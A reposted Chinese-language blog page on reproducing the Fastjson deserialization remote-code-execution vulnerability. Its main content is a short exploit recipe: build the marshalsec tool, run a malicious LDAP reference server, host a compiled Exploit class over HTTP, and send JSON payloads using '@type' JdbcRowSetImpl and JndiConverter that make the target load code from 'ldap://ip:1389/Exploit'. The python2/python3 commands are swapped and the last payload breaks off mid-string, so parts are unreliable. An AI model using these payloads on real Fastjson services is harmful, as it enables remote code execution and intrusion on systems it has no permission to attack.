碼上快樂

相關內容    簡體    繁體

Fastjson反序列化漏洞

本文轉載自   查看原文   2019-12-05 15:44   263    漏洞payload&poc

Fastjson 遠程代碼掃描漏洞復現

  1. 環境搭建
    1)反序列化攻擊工具源碼下載:https://github.com/mbechler/marshalsec
    使用maven命令:mvn clean package -DskipTests 編譯成.jar文件
    啟動(默認端口1389):java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip/#Expolit
  1. 編寫Expolit.java文件
    使用javac Expolit.java,編譯成為class文件
    python2: python -m http.server 80
    python3: python -m SimpleHTTPServer 80
  2. payload:
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}
    {"@type":"org.apache.xbean.propertyeditor.JndiConverter","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}【ip也可直接在http://dnslog.cn/中獲取】
    {"a":"a\x

參考:
https://www.cnblogs.com/Akkuman/p/11190475.html
https://github.com/RealBearcat/Fastjson-Payload


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 fastjson<=1.2.47反序列化漏洞復現 fastjson反序列化漏洞研究(上) fastjson 反序列化漏洞利用總結 fastjson反序列化漏洞原理及利用 fastjson反序列化漏洞始末 fastjson 反序列化漏洞筆記,比較亂 Fastjson<=1.2.47反序列化漏洞復現 Fastjson反序列化漏洞利用分析 最新fastjson反序列化漏洞分析 fastjson<=1.2.47反序列化RCE漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM